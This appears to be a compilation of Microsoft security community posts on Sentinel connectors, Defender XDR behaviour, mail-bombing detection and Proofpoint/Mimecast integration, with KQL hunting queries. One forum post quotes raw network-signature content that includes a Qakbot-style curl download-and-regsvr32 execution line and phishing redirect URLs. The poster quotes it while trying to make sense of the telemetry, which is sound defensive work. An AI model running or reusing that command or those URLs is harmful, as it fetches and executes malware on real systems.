- Key fields enriched: Detailed IP/domain context (ports, PDNS, ASN, etc.)
- Limits/cost: Requires a Team Cymru subscription; potentially high feed cost
- Pros: Rich context (open ports, DNS, certs); great for IOC enrichment. Cons: Complex setup; data lands in custom tables only.

OneLogin IAM
- Data sources: OneLogin user/auth logs
- Sentinel tables: OneLoginEventsV2_CL, OneLoginUsersV2_CL
- Update frequency: Polls hourly
- Auth method: OAuth2 (client ID/secret)
- Key fields enriched: User, app, IP, event type (login, MFA, etc.)
- Limits/cost: OneLogin API: 5K calls/hour; moderate data volume
- Pros: Direct insight into cloud identity use; built-in parser available. Cons: Limited to the OneLogin environment.

PingOne Audit
- Data sources: PingOne audit logs
- Sentinel tables: PingOne_AuditActivitiesV2_CL
- Update frequency: Polls hourly
- Auth method: OAuth2 (client ID/secret)
- Key fields enriched: User actions, admin events, MFA logs
- Limits/cost: Rate limited by Ping license; moderate data volume
- Pros: Captures critical identity events; widely used product. Cons: Requires a PingOne Advanced license for audit logs.

Keeper (custom)
- Data sources: Keeper security events
- Sentinel tables: KeeperLogs_CL (custom)
- Update frequency: Push (continuous)
- Auth method: OAuth2 (client ID/secret) + Azure DCR
- Key fields enriched: Vault logins, record accesses, admin changes
- Limits/cost: None (push model); storage costs apply
- Pros: Visibility into password vault activity (often a blind spot). Cons: More manual setup; custom logs not parsed by default.

Data Flow Diagram

This flowchart shows GreyNoise (GN) feeding the threat intelligence table, Team Cymru feeding enrichment tables, and identity sources pushing logs. All data converges into Sentinel, where enrichment lookups inform analytics and automated responses.
Observed Automation Discrepancies

Hi Team, I want to know the logic behind the Defender XDR automation engine. How does it work? I have observed Defender XDR automation engine behavior contrary to expectations: despite expecting identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching the SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent. A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. The automation was not triggered by our own rules, but by Microsoft's Defender XDR, and we are seeking clarification on the underlying logic.
Protection Against Email Bombs with Microsoft Defender for Office 365

In today's digital age, email remains a critical communication tool for businesses and individuals. However, with the increasing sophistication of cyberattacks, email security has become more important than ever. One such growing threat is email bombing, a form of net abuse that sends large volumes of email to an address to overflow the mailbox, overwhelm the server, or distract attention from important email messages indicating a security breach. (See: Email bomb - Wikipedia.)

Understanding Email Bombing

Email bombing typically involves subscribing victims to a large number of legitimate newsletter and subscription services. Each subscription service sends email notifications, which in aggregate create a large stream of emails into the victim's inbox, making triage of legitimate emails very difficult. This form of attack is essentially a denial-of-service (DoS) attack on the victim's email-triage attention budget.

Hybrid Attacks

More recently, email subscription bombs have been coupled with simultaneous lures on Microsoft Teams, Zoom, or via phone calls. Attackers impersonate IT support and offer to help solve the email problem caused by the spike of unwanted emails, ultimately compromising the victim's system or installing malware on it. This type of attack is effective because it creates a sense of urgency and legitimacy, making victims more likely to accept remote assistance and inadvertently allow malware planting or data theft. Read about the use of mail bombs where threat actors misused Quick Assist in social engineering attacks leading to ransomware | Microsoft Security Blog.

Incidence and Purpose of Email Bombing

Email bombing attacks have been around for many years but can have significant impacts on targeted individuals, such as enterprise executives and HR or finance representatives. These attacks are often used as precursors to more serious security incidents, including malware planting, ransomware, and data exfiltration. They can also mute important security alerts, making it easier for attackers to carry out fraudulent activities without detection.

New Detection Technology for Mail Bombing Attacks

To address these types of attacks, Microsoft Defender has now released a comprehensive solution involving a durable block to limit the influx of emails, the majority of which are often spam. By intelligently tracking message volumes across different sources and time intervals, this new detection leverages historical patterns of the sender and signals related to spam content. It prevents mail bombs from being dropped into the user's inbox; the messages are instead sent to the Junk folder (of Outlook). Note: Safe-sender lists in Outlook continue to be honored, so emails from trustworthy sources are not unexpectedly moved to the Junk folder (in order to prevent false positives). Since the initial rollout that started in early May, we've seen a tremendous impact in blocking mail bombing attacks out of our customers' inboxes.

How to Leverage the New "Mail Bombing" Detection Technology in SOC Experiences

1. Investigation and hunting: SOC analysts can now view the new detection technology as Mail bombing within the following surfaces: Threat Explorer, the Email entity page, and Advanced Hunting, empowering them to investigate, filter, and hunt for threats related to mail bombing.
2. Custom detection rule: To analyze the frequency and volume of attacks from the mail bombing vector, or to have automated alerts notify SOC users whenever there is a mail bombing attack, SOC analysts can use custom detection rules in Advanced Hunting by writing a KQL query against the DetectionMethods column of the EmailEvents table. Here's a sample query to get you started (see also the aggregation sketch at the end of this post):

EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
| project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId

The SOC experiences are rolled out worldwide to all customers.

Conclusion

Email bombs represent a persistent threat in the world of cybersecurity. With the new detection technology for mail bombing, Microsoft Defender for Office 365 protects users from these attacks and empowers Security Operations Center analysts to gain visibility into such attacks and take quick action to keep organizations safe!

Note: Mail bombing protection is available by default in Exchange Online Protection and Microsoft Defender for Office 365 plans. This blog post is associated with Message Center post MC1096885. Also read Part 2 of our blog series to learn more about protection against multi-modal attacks involving mail bombing and correlation of Microsoft Teams activity in Defender. Watch this video to learn more: Microsoft Defender for Office 365 | Mail Bombing and Mixed-Mode Attack Protection.

Learn:
- Detection technology details table
- What's on the Email entity page
- Filterable properties in the All email view in Threat Explorer
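Building on the sample query above, a hedged aggregation sketch to see which mailboxes are being targeted hardest. The columns used (RecipientEmailAddress, SenderFromAddress) are part of the standard EmailEvents schema, while the 1-day window and the grouping are illustrative choices:

EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
// One row per targeted mailbox, with message volume and distinct sender count
| summarize BombMessages = count(), DistinctSenders = dcount(SenderFromAddress) by RecipientEmailAddress
| order by BombMessages desc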
Question: malware autodelete

Can malware like Trojan:Win32/Wacatac.C!ml download other malware that performs the malicious action and then deletes itself? If so, will the next scan by a free antivirus find no trace of the self-deleted malware and therefore not detect it?
NetworkSignatureInspected

Hi, Whilst looking into something, I was thrown off by a line in a device timeline export with an ActionType of NetworkSignatureInspected, and its content. I've read this article, so I understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek. I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields where the ActionType is NetworkSignatureInspected and references, for example, CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://

Defender reports no issues on the device, and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.
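For anyone triaging similar events, a hedged sketch for summarising these signatures in advanced hunting. The SignatureName key inside AdditionalFields is an assumption based on the Zeek enrichment article linked above and should be verified against a sample row from your own data:

DeviceNetworkEvents
| where Timestamp > ago(7d)
| where ActionType == "NetworkSignatureInspected"
// SignatureName is assumed to be a key in AdditionalFields; inspect a sample row first
| extend SignatureName = tostring(parse_json(AdditionalFields).SignatureName)
| summarize Occurrences = count(), Devices = dcount(DeviceId) by SignatureName
| order by Occurrences desc

Seeing the same signatures across many devices is consistent with the "expected behaviour" interpretation: the signature engine records matched content it inspected on the wire, not necessarily a detection on the device itself.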
Security Admin role replacement with Defender XDR

We currently have the Security Administrator role assigned to multiple users in our organization. We are considering replacing it with custom RBAC roles in Microsoft Defender XDR, as described in https://learn.microsoft.com/en-us/defender-xdr/custom-roles. Our goal is to provide these users full access to the Microsoft Defender security portal so they can respond to alerts and manage security operations. They do not require access to the Entra ID portal for tasks such as managing conditional access policies or authentication method policies. Can we completely remove the Security Administrator role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?
Where can I get the latest info on Advanced Hunting Table Retirement

First question - where can I find the latest info on the deprecation of advanced hunting tables?

Background - I was developing some detections and, as I was trying to decide which table I should use, I opened the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating:

"On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until AADSignInEventsBeta is deprecated after the said date. To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes."

"Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table."

This made me very confused, as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means, and I'm hoping to get some clear info on table retirement.
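For reference, a quick way to confirm which of the two tables currently holds data on a tenant (a sketch; `union withsource` and `isfuzzy` are assumed to be available in advanced hunting):

union withsource=SourceTable isfuzzy=true AADSignInEventsBeta, EntraIdSignInEvents
| summarize Rows = count(), Latest = max(Timestamp) by SourceTable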
Integrating Proofpoint and Mimecast Email Security with Microsoft Sentinel

Microsoft Sentinel can ingest rich email security telemetry from Proofpoint and Mimecast to power advanced phishing detection. The Proofpoint On Demand (POD) Email Security and Proofpoint Targeted Attack Protection (TAP) connectors pull threat logs (quarantines, spam, phishing attempts) and user click data into Sentinel. Similarly, the Mimecast Secure Email Gateway connector ingests detailed mail flow and targeted-threat logs (attachment/URL scans, impersonation events). These integrations use Azure-hosted ingestion (via Logic Apps or Azure Functions) and the new Codeless Connector framework to call vendor APIs on a schedule. The result is a consolidated dataset in Sentinel's Log Analytics, enabling correlated alerting and hunting across email, identity, and endpoint signals.

Figure: Phishing emails are processed by Mimecast's gateway and Proofpoint POD/TAP services. Security logs (delivery/quarantine events, malicious attachments/links, user clicks) flow into Microsoft Sentinel. In Sentinel, these mail signals are correlated with identity (Azure AD), endpoint (Defender), and network telemetry for end-to-end phishing detection.

Proofpoint POD (Email Protection) Connector

The Proofpoint POD connector ingests core email protection logs. It creates two tables, ProofpointPODMailLog_CL and ProofpointPODMessage_CL. These logs include per-message metadata (senders, recipients, subject, message size, timestamps), threat scores (spamScore, phishScore, malwareScore, impostorScore), and attachment details (number of attachments, names, hash values, and sandbox verdicts). Quarantine actions are recorded (quarantine folder/rule), and malicious indicators (URL or file hash) and campaign IDs are tagged in the threatsInfoMap field. For example, each ProofpointPODMessage_CL record may carry a sender_s (hashed sender email domain), recipient list, subject, and any detected threat type (Phish/Malware/Spam/Impostor) with the associated threat hash or URL.

Deployment: Proofpoint POD uses Sentinel's codeless connector (an Azure Function behind the scenes). You must provide Proofpoint API credentials (cluster ID and API token) in the connector UI. The connector periodically calls the Proofpoint SIEM API to fetch new log events (typically in 1–2 hour batches). The data lands in the tables above. (Older custom Logic App approaches similarly parse JSON output from the /v2/siem/messages endpoints.)
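As a quick starting point for hunting in the POD data, a hedged sketch that surfaces the noisiest senders of phish-classified mail. The field names (threatsInfoMap_classification_s, sender_s, recipient) follow the queries later in this article but remain assumptions to verify against your ingested schema:

ProofpointPODMessage_CL
| where TimeGenerated > ago(7d)
// Field names are assumptions; verify against your ingested schema
| where threatsInfoMap_classification_s == "Phish"
| summarize PhishMessages = count(), TargetedRecipients = dcount(tostring(recipient)) by Sender = tostring(sender_s)
| top 10 by PhishMessages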
Proofpoint TAP (Targeted Attack Protection) Connector

Proofpoint TAP provides user-click and message-delivery events. Its connector creates four tables: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, and ProofPointTAPClicksBlockedV2_CL. The message tables report emails with detected threats (URL or attachment defense) that were delivered or blocked by TAP. They include the same fields as POD (message GUID, sender, recipients, subject, threat campaign ID, scores, attachment info). The click tables log when users click on URLs: each record has the URL, click timestamp (clickTime), the user's IP (clickIP), user agent, the message GUID, and the threat ID/category. These fields let you see who clicked which malicious link and when. As the connector description notes, these logs give "visibility into Message and Click events in Microsoft Sentinel" for hunting.

Deployment: The TAP connector also uses the codeless framework. You supply a TAP API service principal and secret (Proofpoint SIEM API credentials) in the Sentinel content connector. The Function app calls TAP's /v2/siem/clicks/blocked, /clicks/permitted, /messages/blocked, and /messages/delivered endpoints. The Proofpoint SIEM API limits queries to 1-hour windows and 7 days of history, with no paging (all events in the interval are returned). (A Logic App approach could also be used, as shown in the Tech Community blog: one HTTP GET per event type and a JSON Parse before sending to Log Analytics.)

Mimecast Secure Email Gateway Connector

The Mimecast connector ingests Secure Email Gateway (SEG) logs and targeted threat protection (TTP) logs. Inbound, outbound, and internal mail events from the Mimecast MTA (receipt, processing, and delivery stages) are pulled via the API. Typical fields include the unique message ID (aCode), sender, recipient, subject, attachment count/names, and the policy actions or holds (e.g. spam quarantine). For example, the Mimecast "Process" log shows AttCnt, AttNames, and whether the message was held (Hld) for review. Delivery logs include the success/failure and TLS details. In addition, Mimecast TTP logs are collected: URL Protect logs (when a user clicks a blocked URL) include the clicked URL (url), category (urlCategory), sender/recipient, and block reason. Impersonation Protect logs capture spoofing detections (e.g. if an internal name is impersonated), with fields like Sender, Recipient, Definition, and Action (hold/quarantine). Attachment Protect logs record malicious file detections (filename, hash, threat type).

Deployment: Like Proofpoint, Mimecast's connector uses Azure Functions via the Sentinel Content Hub. You install the Mimecast solution, open the connector page, then enter Azure app credentials and Mimecast API keys (API application ID/key and access/secret for the service account). As shown in the deployment guide, you must provide the Azure subscription, resource group, and Log Analytics workspace, plus the Azure client (app) ID, tenant ID, and object ID of the admin performing the setup. On the Mimecast side, you supply the API base URL (regional), app ID/secret, and user access/secret. The connector creates a Function App that polls Mimecast's SIEM APIs on a cron schedule (default every 30 minutes). You can optionally specify a start date for backfilling up to 7 days of logs. The default tables are MimecastSIEM_CL (for email flow logs) and MimecastDLP_CL (for DLP/TTP events), though custom names can be set.

Ingestion Considerations

Data Latency: All these connectors are pull-based and typically run on a schedule (often 30–60 minutes). For example, the Proofpoint POD docs note hourly log increments, and Mimecast logs are aggregated every 30 minutes. Expect a delay of up to an hour or more from event occurrence to Sentinel ingestion.

Schema Nuances: The APIs often return nested arrays and optional fields. For instance, the Proofpoint blog warns that some JSON fields can be null or vary in type, so the parse schema should account for all possibilities. Similarly, Mimecast logs come in pipe-delimited or JSON format, with values sometimes empty (e.g. no attachments). In KQL, use tostring() or parse_json() on the raw _CL columns, and mv-expand any multivalue fields (like message parts or threat lists).

Table Names: Use the connectors' tables as listed. For Proofpoint POD: ProofpointPODMailLog_CL and ProofpointPODMessage_CL; for TAP: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, and ProofPointTAPClicksBlockedV2_CL. For Mimecast SEG/TTP: MimecastSIEM_CL (SEG logs) and MimecastDLP_CL (TTP logs).
API Behavior: The Proofpoint TAP API has no paging. Be aware of time zones (Proofpoint uses UTC) and use the Sentinel TimeGenerated or event timestamp fields for binning.

Detection Engineering and Correlation

To detect phishing effectively, we correlate these email logs with identity, endpoint, and intel data:

Identity (Azure AD): Mail logs contain recipient addresses and (hashed) sender user parts. A common tactic is to correlate SMTP recipients or sender domains with Azure AD user records. For example, join TAP clicks by recipient to the user's UPN. The Proofpoint logs also include the clicker's IP (clickIP); we can match that to Azure AD sign-in logs or VPN logs to find which device/location clicked a malicious link. Likewise, anomalous Azure AD sign-ins (impossible travel, MFA failure) after a suspicious email can strengthen the case.

Endpoints (Defender): Once a user clicks a bad link or opens a malicious attachment (captured in TAP or Mimecast logs), watch for follow-on behaviors. For instance, use DeviceEvents or DeviceProcessEvents to see whether that user's machine launched unusual processes. The threatID or URL hash from email events can be looked up in Defender's file data. Correlate by username (if available) or IP: if the email log shows a link click from IP X, see whether any endpoint alerts or logon events occurred from X around the same time. As the Mimecast integration touts, this enables "correlation across Mimecast events, cloud, endpoint, and network data".

Threat Intelligence: Use Sentinel's ThreatIntelligenceIndicator tables or Microsoft's TI feeds to tag known bad URLs/domains in the email logs. For example, join ProofPointTAPClicksBlockedV2_CL on the clicked URL against ThreatIntelligenceIndicator (URL indicators) to automatically flag hits. Proofpoint's logs already classify threats (malware/phish) and provide a threatID; this can be enriched with external intel (e.g. check whether the hash appears in TI feeds). Mimecast's URL logs include a urlCategory field, which can be mapped to known malicious categories. Automated playbooks can also pull intel: e.g. use Sentinel's TI REST API or Sentinel watchlists containing phishing domains to annotate events.

In summary, a robust detection strategy might look like this: (1) identify malicious email events (high phish scores, quarantines, URL clicks); (2) correlate these events by user with Azure AD logs (did the user log in from a new IP after a phish click?); (3) correlate with endpoint alerts (Defender found malware on that device); (4) augment with threat intelligence lookups on URLs and attachments from the email logs. By linking the Proofpoint/Mimecast signals to identity and endpoint events, you can detect the full attack chain from email compromise to endpoint breach.

KQL Queries

Here are representative Kusto queries for common phishing scenarios (adapt table/field names as needed):

Malicious URL Click Detection: Identify users who clicked known-malicious URLs. For example, join TAP click logs to TI indicators:
let TI = ThreatIntelligenceIndicator
| where Active == true and isnotempty(Url)
| project Url, Description;
ProofPointTAPClicksPermittedV2_CL
| where url_s != ""
| project ClickTime=TimeGenerated, Recipient=recipient_s, URL=url_s, SenderIP=senderIP_s
| join kind=inner TI on $left.URL == $right.Url
| project ClickTime, Recipient, URL, Description

This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain:

ProofPointTAPClicksPermittedV2_CL
| extend clickedDomain = extract(@"https?://([^/]+)", 1, url_s)
| summarize ClickCount=count() by clickedDomain
| where clickedDomain has "maliciousdomain.com" or clickedDomain has "phish.example.com"

Quarantine Spike (Burst) Detection: Detect sudden spikes in quarantined messages. For example, using the POD mail log:

ProofpointPODMailLog_CL
| where action_s == "Held"
| summarize HeldCount=count() by bin(TimeGenerated, 1h)
| order by TimeGenerated desc
| where HeldCount > 100

This finds hours with an unusually high number of held (quarantined) emails, which may indicate a phishing campaign. You could similarly use ProofPointTAPMessagesBlockedV2_CL.

Targeted User Phishing: Find whether a specific user received multiple malicious emails. E.g., for a given user (user@contoso.com is a placeholder; substitute the real address):

ProofpointPODMessage_CL
| where recipient has "user@contoso.com"
| where array_length(threatsInfoMap) > 0 and threatsInfoMap_classification_s == "Phish"
| project TimeGenerated, sender_s, subject_s, threat=threatsInfoMap_threat_s

This lists recent phish attempts targeting that user. You might also join with TAP click logs to see whether they clicked anything.

Campaign-Level Analysis: Group emails by Proofpoint campaign ID to see the scope of each campaign:

ProofpointPODMessage_CL
| mv-expand threatsInfoMap
| summarize Recipients=make_set(recipient), RecipientCount=dcount(recipient), SampleSubject=take_any(subject_s) by CampaignID=tostring(threatsInfoMap_campaignId_s)
| project CampaignID, RecipientCount, Recipients, SampleSubject

This shows each campaign ID with how many unique recipients were hit and one example subject. Combining TAP and POD tables on GUID_s or QID_s can further link click events back to the originating message/campaign.

Each query can be refined (for instance, filtered to a recent time window) and embedded in Sentinel analytics rules or hunting. The key is using the connectors' fields (URLs, sender/recipient addresses, campaign IDs) to pivot between email data and other security signals.
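The examples above are all Proofpoint-centric; the same patterns apply to the Mimecast tables. A heavily hedged sketch for summarising URL Protect activity per recipient: MimecastSIEM_CL is the table named earlier, but the column names (url_s, urlCategory_s, Recipient_s) are assumptions derived from the fields described in this article and must be verified against your ingested schema:

MimecastSIEM_CL
| where TimeGenerated > ago(7d)
// Column names are assumptions based on the fields described in this article
| where isnotempty(url_s)
| summarize UrlEvents = count(), Categories = make_set(urlCategory_s) by Recipient = tostring(Recipient_s)
| top 10 by UrlEvents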